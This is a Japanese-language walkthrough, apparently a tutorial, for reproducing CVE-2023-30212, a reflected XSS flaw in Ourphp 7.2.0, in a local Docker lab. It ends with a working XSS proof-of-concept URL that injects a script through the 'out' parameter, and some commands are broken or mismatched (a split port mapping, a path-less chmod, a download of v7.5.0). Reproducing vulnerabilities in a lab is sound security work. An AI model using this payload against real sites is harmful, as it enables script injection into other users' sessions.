
CVE-2023-30212(Ourphp 7.2.0のXSS脆弱性)のステップバイステップのエクスプロイトガイド。Dockerセットアップとペイロードインジェクションのデモを含みます。
Ourphp バージョン 7.2.0 の脆弱性を悪用(別名 CVE 2023 30212)
ステップ 1. システムに Docker をダウンロードしてインストール (注)。Ubuntu のインストールが迅速かつ簡単なため、Docker を使用しています。
ステップ 2. Docker 環境をセットアップ
docker pull ubuntu
docker run -d -t –name test-container -p 80:80 -p 443:44
3 -p 3306:3306 -p 21:21 ubuntu
Docker exec -it test-container bash
ステップ 3. Web サーバー、PHP、MySQL をインストール。ここでは xampp サーバーをインストールします。
wget https://liquidtelecom.dl.sourceforge.net/project/xampp/XAMPP%20Linux/7.2.0/xampp-linux-x64-7.2.0-0-installer.run
chmod +x xampp-linux-x64-7.2.0-0-installer.run
./xampp-linux-x64-7.2.0-0-installer.run
/opt/lampp/lampp start
ステップ 4. Ourphp バージョン 7.2.0 をダウンロード
wget https://zdown.chinaz.com/202305/ourphp-zyb-v7.5.0.20230515.zip
unzip ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs/
chmod -R 775
ステップ 5. ブラウザで Ourphp をセットアップ ブラウザを開き、localhost または 127.0.0.1 を入力 指示に従って Ourphp をインストールします。
ステップ 6. 脆弱性の悪用 Ourphp 7.2.0 には XSS(クロスサイトスクリプティング)の脆弱性があります。 XSS コードの実行を可能にする /client/manage/ourphp_out.php ファイルの脆弱性を緩和するには、 コードを修正する必要があります。この脆弱性は、"ourphp_admin" パラメータが "logout" に設定され、制御可能な変数 "out" がエコーされる際に発生します。 攻撃者は、"" のようなペイロードを注入することでこれを悪用できます。
Code: http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert('xss')</script>
